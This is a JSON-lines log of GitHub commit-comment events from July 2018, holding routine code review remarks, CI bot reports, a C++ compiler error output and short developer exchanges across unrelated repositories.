{"id":"7966192158","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710206,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-14T18:43:14Z","updated_at":"2018-07-14T18:43:14Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:43:14Z"}
{"id":"7966192565","type":"CommitCommentEvent","actor":{"login":"tnayanam"},"repo":{"name":"tnayanam/Fiddler"},"payload":{"comment":{"id":29710207,"position":10,"line":10,"path":"New Text Document.txt","commit_id":"fc6200b3dddb82a1a944b5e409c7979c41b51eb4","created_at":"2018-07-14T18:43:34Z","updated_at":"2018-07-14T18:43:34Z","author_association":"OWNER","body":"![sd1](https://user-images.githubusercontent.com/17131576/42727422-46a291ae-8774-11e8-8c0c-f3c2af278b56.PNG)\r\n"}},"created_at":"2018-07-14T18:43:34Z"}
{"id":"7966192660","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710208,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-14T18:43:38Z","updated_at":"2018-07-14T18:43:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:43:38Z"}
{"id":"7966193443","type":"CommitCommentEvent","actor":{"login":"tnayanam"},"repo":{"name":"tnayanam/Fiddler"},"payload":{"comment":{"id":29710210,"position":11,"line":11,"path":"New Text Document.txt","commit_id":"fc6200b3dddb82a1a944b5e409c7979c41b51eb4","created_at":"2018-07-14T18:44:15Z","updated_at":"2018-07-14T18:44:15Z","author_association":"OWNER","body":"![sd](https://user-images.githubusercontent.com/17131576/42727427-5f97fe4c-8774-11e8-85ff-338d1500eb5c.png)\r\n"}},"created_at":"2018-07-14T18:44:15Z"}
{"id":"7966193781","type":"CommitCommentEvent","actor":{"login":"winstonchiong"},"repo":{"name":"DecisionLabUCSF/decisionlabucsf.github.io"},"payload":{"comment":{"id":29710211,"position":5,"line":104,"path":"_data/members.yml","commit_id":"68f4dbcee092c77735f8c3c2fc39171d05353017","created_at":"2018-07-14T18:44:34Z","updated_at":"2018-07-14T18:44:34Z","author_association":"COLLABORATOR","body":"Might be a bit redundant in the context of the site to say that you're an SRA (right now your title is listed as research coordinator, which to me is just a more general term) in the Decision Lab with me. Maybe just start with \"I received my BA...\""}},"created_at":"2018-07-14T18:44:34Z"}
{"id":"7966194647","type":"CommitCommentEvent","actor":{"login":"Fabinout"},"repo":{"name":"okiwi/awesome"},"payload":{"comment":{"id":29710216,"position":null,"line":null,"path":null,"commit_id":"bcbb210b1d09ca48ae55bb6a45bd41f68a5a3447","created_at":"2018-07-14T18:45:20Z","updated_at":"2018-07-14T18:45:20Z","author_association":"CONTRIBUTOR","body":"Y a des vidéos, pas que des livres :)"}},"created_at":"2018-07-14T18:45:20Z"}
{"id":"7966194754","type":"CommitCommentEvent","actor":{"login":"brettwooldridge"},"repo":{"name":"brettwooldridge/NuProcess"},"payload":{"comment":{"id":29710217,"position":43,"line":49,"path":"src/main/java/com/zaxxer/nuprocess/linux/EpollEvent.java","commit_id":"4989a9edc2a8f0dbed19bc03b9dfaa6a0963067d","created_at":"2018-07-14T18:45:25Z","updated_at":"2018-07-14T18:45:25Z","author_association":"OWNER","body":"Do you think it makes sense to use ``ALIGN_DEFAULT``?  According to JNA doc:\r\n> Use the platform default alignment.\r\n\r\nOtherwise, we can certainly put in platform detection, as we do for Java version detection..."}},"created_at":"2018-07-14T18:45:25Z"}
{"id":"7966195189","type":"CommitCommentEvent","actor":{"login":"winstonchiong"},"repo":{"name":"DecisionLabUCSF/decisionlabucsf.github.io"},"payload":{"comment":{"id":29710218,"position":8,"line":107,"path":"_data/members.yml","commit_id":"68f4dbcee092c77735f8c3c2fc39171d05353017","created_at":"2018-07-14T18:45:46Z","updated_at":"2018-07-14T18:45:46Z","author_association":"COLLABORATOR","body":"Need three carriage returns to create a new paragraph in YAML"}},"created_at":"2018-07-14T18:45:46Z"}
{"id":"7966195270","type":"CommitCommentEvent","actor":{"login":"573"},"repo":{"name":"nicolasmiller/vcv-gratrix"},"payload":{"comment":{"id":29710219,"position":null,"line":null,"path":null,"commit_id":"7e4381ba484bcadbaf6e61de553eea46170a4e4d","created_at":"2018-07-14T18:45:49Z","updated_at":"2018-07-14T18:45:49Z","author_association":"NONE","body":"Hi,\r\nI would like to use your repo as long as gratrix' one doesn't have the PR accepted.\r\nI get the following compiler output though, maybe I have forgotten a step?\r\n\r\n>rack_plugins_1      | g++ -Wsuggest-override -std=c++11 -I../../src/core -DSLUG=Gratrix -fPIC -I../../include -I../../dep/include -DVERSION=0.6.0 -MMD -MP -g -O3 -march=nocona -ffast-math -fno-finite-math-only -Wall -Wextra -Wno-unused-parameter -DARCH_LIN -c -o build/src/Seq-G2.cpp.o src/Seq-G2.cpp\r\nrack_plugins_1      | In file included from ../../include/rack.hpp:4:0,\r\nrack_plugins_1      |                  from src/Gratrix.hpp:13,\r\nrack_plugins_1      |                  from src/Seq-G2.cpp:10:\r\nrack_plugins_1      | ../../include/util/common.hpp:214:28: error: expected ';' at end of member declaration\r\nrack_plugins_1      |  #define debug(format, ...) loggerLog(DEBUG_LEVEL, __FILE__, __LINE__, format, ##__VA_ARGS__)\r\nrack_plugins_1      |                             ^\r\nrack_plugins_1      | src/Seq-G2.cpp:190:17: note: in expansion of macro 'debug'\r\nrack_plugins_1      |    std::ostream &debug(std::ostream &os) const\r\nrack_plugins_1      |                  ^\r\nrack_plugins_1      | ../../include/util/common.hpp:214:49: error: expected ')' before ',' token\r\nrack_plugins_1      |  #define debug(format, ...) loggerLog(DEBUG_LEVEL, __FILE__, __LINE__, format, ##__VA_ARGS__)\r\nrack_plugins_1      |                                                  ^\r\nrack_plugins_1      | src/Seq-G2.cpp:190:17: note: in expansion of macro 'debug'\r\nrack_plugins_1      |    std::ostream &debug(std::ostream &os) const\r\nrack_plugins_1      |                  ^\r\nrack_plugins_1      | src/Seq-G2.cpp: In constructor 'GTX::Seq_G2::GtxModule::LcdData::LcdData()':\r\nrack_plugins_1      | src/Seq-G2.cpp:166:3: error: uninitialized reference member in 'std::ostream& {aka class std::basic_ostream<char>&}' [-fpermissive]\r\nrack_plugins_1      |    LcdData()\r\nrack_plugins_1      |    ^\r\nrack_plugins_1      | In file included from ../../include/rack.hpp:4:0,\r\nrack_plugins_1      |                  from src/Gratrix.hpp:13,\r\nrack_plugins_1      |                  from src/Seq-G2.cpp:10:\r\nrack_plugins_1      | ../../include/util/common.hpp:214:38: note: 'std::ostream& GTX::Seq_G2::GtxModule::LcdData::loggerLog' should be initialized\r\nrack_plugins_1      |  #define debug(format, ...) loggerLog(DEBUG_LEVEL, __FILE__, __LINE__, format, ##__VA_ARGS__)\r\nrack_plugins_1      |                                       ^\r\nrack_plugins_1      | src/Seq-G2.cpp:190:17: note: in expansion of macro 'debug'\r\nrack_plugins_1      |    std::ostream &debug(std::ostream &os) const\r\nrack_plugins_1      |                  ^\r\nrack_plugins_1      | src/Seq-G2.cpp: In member function 'void GTX::Seq_G2::GtxModule::clear_prog(std::size_t)':\r\nrack_plugins_1      | src/Seq-G2.cpp:785:31: error: use of deleted function 'GTX::Seq_G2::GtxModule::LcdData& GTX::Seq_G2::GtxModule::LcdData::operator=(GTX::Seq_G2::GtxModule::LcdData&&)'\r\nrack_plugins_1      |      lcd_state[prog][row][col] = LcdData();\r\nrack_plugins_1      |                                ^\r\nrack_plugins_1      | src/Seq-G2.cpp:158:9: note: 'GTX::Seq_G2::GtxModule::LcdData& GTX::Seq_G2::GtxModule::LcdData::operator=(GTX::Seq_G2::GtxModule::LcdData&&)' is implicitly deleted because the default definition would be ill-formed:\r\nrack_plugins_1      |   struct LcdData\r\nrack_plugins_1      |          ^\r\nrack_plugins_1      | src/Seq-G2.cpp:158:9: error: non-static reference member 'std::ostream& GTX::Seq_G2::GtxModule::LcdData::loggerLog', can't use default assignment operator\r\nrack_plugins_1      | src/Seq-G2.cpp: In member function 'void GTX::Seq_G2::GtxModule::copy_prog(std::size_t)':\r\nrack_plugins_1      | src/Seq-G2.cpp:835:25: error: use of deleted function 'GTX::Seq_G2::GtxModule::LcdData& GTX::Seq_G2::GtxModule::LcdData::operator=(const GTX::Seq_G2::GtxModule::LcdData&)'\r\nrack_plugins_1      |      lcd_cache[row][col] = lcd_state[prog][row][col];\r\nrack_plugins_1      |                          ^\r\nrack_plugins_1      | src/Seq-G2.cpp:158:9: note: 'GTX::Seq_G2::GtxModule::LcdData& GTX::Seq_G2::GtxModule::LcdData::operator=(const GTX::Seq_G2::GtxModule::LcdData&)' is implicitly deleted because the default definition would be ill-formed:\r\nrack_plugins_1      |   struct LcdData\r\nrack_plugins_1      |          ^\r\nrack_plugins_1      | src/Seq-G2.cpp:158:9: error: non-static reference member 'std::ostream& GTX::Seq_G2::GtxModule::LcdData::loggerLog', can't use default assignment operator\r\nrack_plugins_1      | src/Seq-G2.cpp: In member function 'void GTX::Seq_G2::GtxModule::paste_prog(std::size_t)':\r\nrack_plugins_1      | src/Seq-G2.cpp:861:31: error: use of deleted function 'GTX::Seq_G2::GtxModule::LcdData& GTX::Seq_G2::GtxModule::LcdData::operator=(const GTX::Seq_G2::GtxModule::LcdData&)'\r\nrack_plugins_1      |      lcd_state[prog][row][col] = lcd_cache[row][col];\r\nrack_plugins_1      |                                ^\r\nrack_plugins_1      | ../../compile.mk:64: recipe for target 'build/src/Seq-G2.cpp.o' failed\r\nrack_plugins_1      | make: *** [build/src/Seq-G2.cpp.o] Error 1"}},"created_at":"2018-07-14T18:45:49Z"}
{"id":"7966195339","type":"CommitCommentEvent","actor":{"login":"lidel"},"repo":{"name":"ipfs-shipyard/ipfs-webui"},"payload":{"comment":{"id":29710220,"position":null,"line":null,"path":null,"commit_id":"552bd0fbe4c7b6e5a31a8f8165103ec8d897f60a","created_at":"2018-07-14T18:45:52Z","updated_at":"2018-07-14T18:45:52Z","author_association":"CONTRIBUTOR","body":"Cool filename for tests:\r\nhttps://upload.wikimedia.org/wikipedia/commons/0/0d/250px%D9%8A%D9%88%D8%B3%D9%81_%D8%A7%D9%84%D9%88%D8%B2%D8%A7%D9%86%D9%8A_%D8%B5%D9%88%D8%B1%D8%A9_%D9%85%D9%84%D8%AA%D9%82%D8%B7%D8%A9_%D8%A8%D9%88%D8%A7%D8%B3%D8%B7%D8%A9_%D9%85%D8%B1%D8%B5%D8%AF_%D9%87%D8%A7%D8%A8%D9%84_%D8%A7%D9%84%D9%81%D8%B6%D8%A7%D8%A6%D9%8A_%D8%AA%D9%88%D8%B6%D8%AD_%D8%B3%D8%AF%D9%8A%D9%85_%D8%A7%D9%84%D8%B3%D8%B1%D8%B7%D8%A7%D9%86%D8%8C_%D9%88%D9%87%D9%88_%D8%A8%D9%82%D8%A7%D9%8A%D8%A7_%D9%85%D8%B3%D8%AA%D8%B9%D8%B1_%D8%A3%D8%B9%D8%B8%D9%85._.jpg\r\n\r\n:D "}},"created_at":"2018-07-14T18:45:52Z"}
{"id":"7966196029","type":"CommitCommentEvent","actor":{"login":"darnuria"},"repo":{"name":"mart1ver/oressource"},"payload":{"comment":{"id":29710221,"position":4,"line":213,"path":"js/ventes.js","commit_id":"6c9e005b3d59e1e5c3f177d309019bf7fb80f388","created_at":"2018-07-14T18:46:27Z","updated_at":"2018-07-14T18:46:27Z","author_association":"COLLABORATOR","body":"@mart1ver: C'est pas pertinent d'un point de vue comptable.\r\nOn en avait parler un *lot* c'est comptablement un objet un peu a part. Ça fait perdre une information statistique ensuite.\r\n\r\nExemple: Si tu vends 5 bouteilles d'eau 7 eur chacune c'est pas pareil que vendre un lot de 5 bouteille a 7 eur. (point de vue comptable le lot est une ligne de comptabilité différente vu que le prix unitaire disparaît en fait).\r\n\r\nUne solution élégante c'est envoyer au serveur la quantité et le prix unitaire et si on à fait un lot ensuite coté serveur on enregistre proprement peut être, plutôt que de faire ces choix coté clients."}},"created_at":"2018-07-14T18:46:27Z"}
{"id":"7966197000","type":"CommitCommentEvent","actor":{"login":"icoloma"},"repo":{"name":"koliseoapi/koliseo-agenda"},"payload":{"comment":{"id":29710224,"position":128,"line":106,"path":"src/model/AgendaCell.js","commit_id":"68212d0300f8cf014f638930500c580408640bcc","created_at":"2018-07-14T18:47:17Z","updated_at":"2018-07-14T18:47:17Z","author_association":"COLLABORATOR","body":"I'm thinking about having these three calls (query, tags, bookmarks) delegated into a single method `CellContents.passesFilter({queryTerms, tags, bookmarks, currentUser })`. Tell, don't ask. Makes sense?"}},"created_at":"2018-07-14T18:47:17Z"}
{"id":"7966198718","type":"CommitCommentEvent","actor":{"login":"juniper77"},"repo":{"name":"juniper77/CanoB_UCExtension_Py"},"payload":{"comment":{"id":29710226,"position":null,"line":null,"path":null,"commit_id":"d4efab49ad951c64957742a3d502ec30a46af769","created_at":"2018-07-14T18:48:44Z","updated_at":"2018-07-14T18:48:44Z","author_association":"OWNER","body":"+ZIP file \"Brian_cano_project_CSVs.zip\" contains:\r\n+  one .py code file \"BrianCano_finalproject.py\" \r\n+  folder with 2 CSVs (raw data) \"baseballdatabank_2017\"\r\n+\r\n+Place the py code and the folder in the same directory.  \r\n+.py code refers to the CSV files with a relative path. \r\n+\r\n+when your run the .py code file, you will get a user prompt asking if you want to use default values or not.\r\n+Easiest thing for you to do is respond 'y' to automatically generate the output "}},"created_at":"2018-07-14T18:48:44Z"}
{"id":"7966198932","type":"CommitCommentEvent","actor":{"login":"Grsmto"},"repo":{"name":"Grsmto/simplebar"},"payload":{"comment":{"id":29710228,"position":4,"line":408,"path":"packages/simplebar/src/simplebar.js","commit_id":"acc6789fe5dd1b81d5cc650d04b7585d42df82e6","created_at":"2018-07-14T18:48:55Z","updated_at":"2018-07-14T18:48:55Z","author_association":"OWNER","body":"Hey @staabm if you're interested I had another go at implementing RAQ, you can take a look at [this commit](https://github.com/Grsmto/simplebar/commit/ea9a1429c73acbb14b1425be4e49bcf571849f61). Thanks!"}},"created_at":"2018-07-14T18:48:55Z"}
{"id":"7966199140","type":"CommitCommentEvent","actor":{"login":"mwjames"},"repo":{"name":"SemanticMediaWiki/SemanticMediaWiki"},"payload":{"comment":{"id":29710229,"position":null,"line":null,"path":null,"commit_id":"98f94b10a8f498ca9886ab3b10e3234859df58ff","created_at":"2018-07-14T18:49:07Z","updated_at":"2018-07-14T18:49:07Z","author_association":"CONTRIBUTOR","body":"@kghbln I did quick update and added some subsections to allow to have a better overview of what changed where."}},"created_at":"2018-07-14T18:49:07Z"}
{"id":"7966199156","type":"CommitCommentEvent","actor":{"login":"winstonchiong"},"repo":{"name":"DecisionLabUCSF/decisionlabucsf.github.io"},"payload":{"comment":{"id":29710230,"position":6,"line":105,"path":"_data/members.yml","commit_id":"68f4dbcee092c77735f8c3c2fc39171d05353017","created_at":"2018-07-14T18:49:08Z","updated_at":"2018-07-14T18:49:08Z","author_association":"COLLABORATOR","body":"\"Here,...\" is a bit ambiguous between the Cash lab and 'here' i.e. UCSF. I'd suggest \"There,...\" instead. If you'd like to create a hyperlink to the Cash lab website, do this: [Cortical Physiology lab](http://cashlab.mgh.harvard.edu/){:target=\"\\_blank\"} "}},"created_at":"2018-07-14T18:49:08Z"}
{"id":"7966201035","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29710232,"position":null,"line":null,"path":null,"commit_id":"69f4a76c2d9e1b03f043548ab174fd3b8d034f5f","created_at":"2018-07-14T18:50:40Z","updated_at":"2018-07-14T18:50:40Z","author_association":"OWNER","body":"Build version: __`2.2.0-master.63`__ :crossed_fingers: [`master`](https://github.com/streamich/nano-css/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/63) :tada:"}},"created_at":"2018-07-14T18:50:40Z"}
{"id":"7966201130","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29710233,"position":51,"line":357,"path":"gui/CMainWindow.cpp","commit_id":"6931b825544acca912e0298e8c373a756cb6d37c","created_at":"2018-07-14T18:50:45Z","updated_at":"2018-07-14T18:50:45Z","author_association":"OWNER","body":"Sure! Been fixing some other issues, will get back to this soon.."}},"created_at":"2018-07-14T18:50:45Z"}
{"id":"7966201239","type":"CommitCommentEvent","actor":{"login":"KConra01"},"repo":{"name":"CWJamieson/RangersGit"},"payload":{"comment":{"id":29710234,"position":null,"line":null,"path":null,"commit_id":"bab4d0276a61e38abbc57e686694de17cc3c162a","created_at":"2018-07-14T18:50:50Z","updated_at":"2018-07-14T18:50:50Z","author_association":"COLLABORATOR","body":"I have no recollection of doing this. I think it just pushed today... I assume it still works fine because I'm sure I committed it at some point. Also not all the changes were done by me, so idk what happened there"}},"created_at":"2018-07-14T18:50:50Z"}
{"id":"7966202215","type":"CommitCommentEvent","actor":{"login":"icoloma"},"repo":{"name":"koliseoapi/koliseo-agenda"},"payload":{"comment":{"id":29710236,"position":83,"line":124,"path":"src/stores/AgendaStore.js","commit_id":"68212d0300f8cf014f638930500c580408640bcc","created_at":"2018-07-14T18:51:44Z","updated_at":"2018-07-14T18:51:44Z","author_association":"COLLABORATOR","body":"Does not look like a good idea. We need a single source of truth for the user. It's been injected to all views through the React context, we can find alternatives if needed but we should not reproduce in the model in points that we do not track. "}},"created_at":"2018-07-14T18:51:44Z"}
{"id":"7966203464","type":"CommitCommentEvent","actor":{"login":"icoloma"},"repo":{"name":"koliseoapi/koliseo-agenda"},"payload":{"comment":{"id":29710238,"position":157,"line":148,"path":"src/model/AgendaDay.js","commit_id":"68212d0300f8cf014f638930500c580408640bcc","created_at":"2018-07-14T18:52:47Z","updated_at":"2018-07-14T18:52:47Z","author_association":"COLLABORATOR","body":"Please do not combine prettier if the PR is not trivial. Better use two separate PRs / commits."}},"created_at":"2018-07-14T18:52:47Z"}
{"id":"7966207421","type":"CommitCommentEvent","actor":{"login":"icoloma"},"repo":{"name":"koliseoapi/koliseo-agenda"},"payload":{"comment":{"id":29710240,"position":80,"line":139,"path":"src/view/FilterView.js","commit_id":"68212d0300f8cf014f638930500c580408640bcc","created_at":"2018-07-14T18:56:10Z","updated_at":"2018-07-14T18:56:10Z","author_association":"COLLABORATOR","body":"It seems that we are using `TagsFieldsetView` just to save a couple lines of code? It does not seem like the right abstraction. Either use a different abstract class (does not seem worth the effort) or just duplicate the relevant parts of the code."}},"created_at":"2018-07-14T18:56:10Z"}
{"id":"7966207608","type":"CommitCommentEvent","actor":{"login":"kd-11"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":29710241,"position":null,"line":null,"path":null,"commit_id":"e7f30640ef5ab8ce7b3647a3dea247d5e480cd83","created_at":"2018-07-14T18:56:18Z","updated_at":"2018-07-14T18:56:18Z","author_association":"CONTRIBUTOR","body":"What AniLeo means is that async shaders have always been on the roadmap, since before even I joined rpcs3 so it was always going to happen. You have to keep in mind, this system could not have worked before without other parts being finished first, such as the program analyser/preprocessor. You can also see remnants of old rpcs3 async shaders in the code, e.g the decompiler classes are split into 2 : thread and program, but for some reason the thread aspect was made to be a stub and blocks. I think early in rpcs3 development this was attempted but failed since the emulator was not mature enough. This would have been around the same time you speak of, maybe 5 or 6 years ago. "}},"created_at":"2018-07-14T18:56:18Z"}
{"id":"7966210234","type":"CommitCommentEvent","actor":{"login":"brettwooldridge"},"repo":{"name":"brettwooldridge/NuProcess"},"payload":{"comment":{"id":29710244,"position":43,"line":49,"path":"src/main/java/com/zaxxer/nuprocess/linux/EpollEvent.java","commit_id":"4989a9edc2a8f0dbed19bc03b9dfaa6a0963067d","created_at":"2018-07-14T18:58:24Z","updated_at":"2018-07-14T18:58:24Z","author_association":"OWNER","body":"Strange, [this seems to imply](https://stackoverflow.com/questions/23266411/linaro-g-aarch64-compilation-cause-unalignment-fault) that unaligned access is the default on Arm8 (64-bit)..."}},"created_at":"2018-07-14T18:58:24Z"}
{"id":"7966210439","type":"CommitCommentEvent","actor":{"login":"fariouche"},"repo":{"name":"fariouche/rtl8812au-1"},"payload":{"comment":{"id":29710246,"position":null,"line":null,"path":null,"commit_id":"9175cd68dbf383f27a178b054ba3369e93d4a00b","created_at":"2018-07-14T18:58:32Z","updated_at":"2018-07-14T18:58:32Z","author_association":"OWNER","body":"@kimocoder I've got few minutes, check my commit. This is the closest to your branch and it is working with my 8821au.\r\nI've also reverted some of your cosmetic changes (I prefer to make future realtek merges easier. If we start to make unneeded changes, we'll be lost very quickly)"}},"created_at":"2018-07-14T18:58:32Z"}
{"id":"7966213290","type":"CommitCommentEvent","actor":{"login":"marcoagpinto"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29710255,"position":null,"line":null,"path":null,"commit_id":"1a1dc7f0752a523aab44a899485fd06ba6db7f31","created_at":"2018-07-14T19:00:46Z","updated_at":"2018-07-14T19:00:46Z","author_association":"MEMBER","body":"Thank you, Tiago."}},"created_at":"2018-07-14T19:00:46Z"}
{"id":"7966214316","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/backward-cpp-feedstock"},"payload":{"comment":{"id":29710257,"position":null,"line":null,"path":null,"commit_id":"abcbeb7bb94cfc2e459791291e176f7cabf0f27d","created_at":"2018-07-14T19:01:28Z","updated_at":"2018-07-14T19:01:28Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @bombela were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @bombela were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-14T19:01:28Z"}
{"id":"7966216690","type":"CommitCommentEvent","actor":{"login":"dchapes"},"repo":{"name":"takatoh/fft"},"payload":{"comment":{"id":29710262,"position":15,"line":15,"path":"fft.go","commit_id":"5a2726b569b56b2868f36fbf749346b9d78ab754","created_at":"2018-07-14T19:03:23Z","updated_at":"2018-07-14T19:03:23Z","author_association":"NONE","body":"In Go this should be `x[i], x[j] = x[j], x[i]`."}},"created_at":"2018-07-14T19:03:23Z"}
{"id":"7966216850","type":"CommitCommentEvent","actor":{"login":"georgehazan"},"repo":{"name":"miranda-ng/miranda-ng"},"payload":{"comment":{"id":29710263,"position":null,"line":null,"path":null,"commit_id":"8cf9463b8e4965927593eab08297f66ebf752264","created_at":"2018-07-14T19:03:31Z","updated_at":"2018-07-14T19:03:31Z","author_association":"MEMBER","body":"also fixes #1491"}},"created_at":"2018-07-14T19:03:31Z"}
{"id":"7966218670","type":"CommitCommentEvent","actor":{"login":"brettwooldridge"},"repo":{"name":"brettwooldridge/NuProcess"},"payload":{"comment":{"id":29710266,"position":43,"line":49,"path":"src/main/java/com/zaxxer/nuprocess/linux/EpollEvent.java","commit_id":"4989a9edc2a8f0dbed19bc03b9dfaa6a0963067d","created_at":"2018-07-14T19:05:00Z","updated_at":"2018-07-14T19:05:00Z","author_association":"OWNER","body":"Looks like I might be able to test on an Arm64 for 0.006Eur/hr.\r\n\r\nhttps://www.scaleway.com/virtual-cloud-servers/#anchor_arm\r\n"}},"created_at":"2018-07-14T19:05:00Z"}
{"id":"7966221967","type":"CommitCommentEvent","actor":{"login":"alexandrubirlan"},"repo":{"name":"sleek0/LogToCSV"},"payload":{"comment":{"id":29710275,"position":9,"line":9,"path":"src/com/and/MeasSeries.java","commit_id":"de841c9f8cafce4f78c5a742b982b7a9a0ba419d","created_at":"2018-07-14T19:07:45Z","updated_at":"2018-07-14T19:07:45Z","author_association":"COLLABORATOR","body":"Ar trebui sa ai un obiect care sa tina valorile sau simple String uri pentru valori in setul asta. Tu aici ai in set un obiect care are la randul lui un set cu alte.obiecte ce au la randul lor un set... Fie faci un Set<String> sau Set<Masuratoare> iar in măsurătoare sa tii.valorile..."}},"created_at":"2018-07-14T19:07:45Z"}
{"id":"7966223683","type":"CommitCommentEvent","actor":{"login":"JayDSingh"},"repo":{"name":"JayDSingh/SpongeGuyParkFeld"},"payload":{"comment":{"id":29710277,"position":null,"line":null,"path":null,"commit_id":"9ed3fca9735474f29f2dde6cc9a6a91def688e15","created_at":"2018-07-14T19:09:07Z","updated_at":"2018-07-14T19:09:07Z","author_association":"OWNER","body":"As a preliminary metric I ordered the contributors by number of commits. This is not perfect (obviously spamming commits does little to help the project) but based on how I've seen everyone work it seemed relatively fair in our situation. If there are any disagreements we can discuss a better way to judge everyone's contributions."}},"created_at":"2018-07-14T19:09:07Z"}
{"id":"7966224906","type":"CommitCommentEvent","actor":{"login":"past-due"},"repo":{"name":"miniupnp/miniupnp"},"payload":{"comment":{"id":29710282,"position":null,"line":null,"path":null,"commit_id":"8babc5d01310599ffdfddce09b9cbbd68e508acc","created_at":"2018-07-14T19:10:09Z","updated_at":"2018-07-14T19:10:09Z","author_association":"NONE","body":"@miniupnp: What were the MSVC warnings?"}},"created_at":"2018-07-14T19:10:09Z"}
{"id":"7966224967","type":"CommitCommentEvent","actor":{"login":"alex-eri"},"repo":{"name":"jlaine/aiortc"},"payload":{"comment":{"id":29710283,"position":null,"line":null,"path":null,"commit_id":"a9267730499738810d18f999d8e2ad1d2a3648d8","created_at":"2018-07-14T19:10:11Z","updated_at":"2018-07-14T19:10:11Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-14T19:10:11Z"}
{"id":"7966225120","type":"CommitCommentEvent","actor":{"login":"bturner"},"repo":{"name":"brettwooldridge/NuProcess"},"payload":{"comment":{"id":29710284,"position":43,"line":49,"path":"src/main/java/com/zaxxer/nuprocess/linux/EpollEvent.java","commit_id":"4989a9edc2a8f0dbed19bc03b9dfaa6a0963067d","created_at":"2018-07-14T19:10:16Z","updated_at":"2018-07-14T19:10:16Z","author_association":"CONTRIBUTOR","body":"`ALIGN_DEFAULT` appears to be a \"smart\" toggle between `ALIGN_GNUC` and `ALIGN_MSVC`, so it still makes the structure 16 bytes on x86-64. It doesn't seem like there's any \"automatic\" way that JNA could detect that the struct is defined as packed, since it's not a library-level property.\r\n\r\nI've been trying to find some aarch64 headers to see what `epoll_event` looks like, but so far no luck."}},"created_at":"2018-07-14T19:10:16Z"}
{"id":"7966225475","type":"CommitCommentEvent","actor":{"login":"alexandrubirlan"},"repo":{"name":"sleek0/LogToCSV"},"payload":{"comment":{"id":29710286,"position":36,"line":36,"path":"src/com/and/ReadFile.java","commit_id":"de841c9f8cafce4f78c5a742b982b7a9a0ba419d","created_at":"2018-07-14T19:10:32Z","updated_at":"2018-07-14T19:10:32Z","author_association":"COLLABORATOR","body":"try{}catch{} finally{} cand lucrezi cu resurse gen fișiere, retea, streams.. Si in catch prinzi exceptiile"}},"created_at":"2018-07-14T19:10:32Z"}
{"id":"7966226452","type":"CommitCommentEvent","actor":{"login":"kimocoder"},"repo":{"name":"fariouche/rtl8812au-1"},"payload":{"comment":{"id":29710287,"position":null,"line":null,"path":null,"commit_id":"9b10624e57934a35ae6071fe9abf56d7ec7e7b55","created_at":"2018-07-14T19:11:21Z","updated_at":"2018-07-14T19:11:21Z","author_association":"NONE","body":"Awesome! It works like a charm, you did that quite fast sir <3"}},"created_at":"2018-07-14T19:11:21Z"}
